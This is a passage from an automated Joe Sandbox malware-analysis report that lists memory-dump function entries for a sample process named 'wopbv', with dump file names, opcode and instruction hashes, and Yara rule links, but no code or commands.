                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                              • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                              • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                              • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                              Function 054575A5 Relevance: .0, Instructions: 8COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2633577760.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5450000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e21c71e2944ed858133f206916cb8d935517861781814912b93e2fc7a6a41cdc
                                              • Instruction ID: 0ff62e495d542e8ef19421aab88298554fbeb4cd1416713853bfcec8e926b2e2
                                              • Opcode Fuzzy Hash: e21c71e2944ed858133f206916cb8d935517861781814912b93e2fc7a6a41cdc
                                              • Instruction Fuzzy Hash: 3BC01230159589CBC700EB64E91EAAEBF61AF0632DF060598E0466758BCF780808CE46
                                              Function 00CF5CC8 Relevance: .0, Instructions: 7COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3286a85a60df481908c9a4c7889d0b01d05e00f591092895df0dcc08284b3e26
                                              • Instruction ID: 0d81b54596d7fa4501a3dbb6bf92624f3394c6ed329759616768c8dee818ed91
                                              • Opcode Fuzzy Hash: 3286a85a60df481908c9a4c7889d0b01d05e00f591092895df0dcc08284b3e26
                                              • Instruction Fuzzy Hash: CCA0122054430D0B894023F42C0822C778C19452043800091540E53241DC1958100248
                                              Function 05217888 Relevance: .0, Instructions: 7COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9ac879c24a5871463ac6cf71757314c1aa945d1897e5c734febea6293ee3b9d4
                                              • Instruction ID: 4b587f26e97da8c51a357175e2b15b81d2a6d0278186b9562a3a0a410f951a95
                                              • Opcode Fuzzy Hash: 9ac879c24a5871463ac6cf71757314c1aa945d1897e5c734febea6293ee3b9d4
                                              • Instruction Fuzzy Hash: 99B09232000208AB86049B88EC0496ABB69AB59740B10C025E60906122CB32A822DA94
                                              Function 052112B0 Relevance: .0, Instructions: 6COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2632928727.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_5210000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6b7cdf9abe58bb411351fcd03d4dd2ba4d4afa7d1220796f50501b548f77e46e
                                              • Instruction ID: 72b627377128ef427a14ec509d1aabcb1cb477daf87ea6d5bd093049266c3d1c
                                              • Opcode Fuzzy Hash: 6b7cdf9abe58bb411351fcd03d4dd2ba4d4afa7d1220796f50501b548f77e46e
                                              • Instruction Fuzzy Hash: 7AB092A4A8A3856FDB02A3B0592AC483E222A1220038508CB8182CE0A3E85844048B29
                                              Function 00CF0850 Relevance: .0, Instructions: 5COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f05e2c40c3adc93bac0083899a94b741e1f27f8fe8e465b3dbcd589f0f6431c8
                                              • Instruction ID: fa73b8aa373050667e7b00c0f1d1432452d6e5c6901f2a2560aadbdd529b622f
                                              • Opcode Fuzzy Hash: f05e2c40c3adc93bac0083899a94b741e1f27f8fe8e465b3dbcd589f0f6431c8
                                              • Instruction Fuzzy Hash: A190023144560C8F464427E5780975B775CA585519B840151A50D425115B9564204595
                                              Function 00CF0B30 Relevance: .0, Instructions: 3COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2618695013.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_cf0000_wopbv.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 036f25f6ffdf62b68f7b26b2d4ae30ad30ca07df99eb4f628be5766ec637717b
                                              • Instruction ID: 6f492d5736e8e2db6da37fb242c2c5d946e5a23f1e20bb7f1bb988c7f8d2164e
                                              • Opcode Fuzzy Hash: 036f25f6ffdf62b68f7b26b2d4ae30ad30ca07df99eb4f628be5766ec637717b
                                              • Instruction Fuzzy Hash: 25A002F46011018FCE08DB21DB5BA6AFB35BBC13053158295900A460618B609850CA40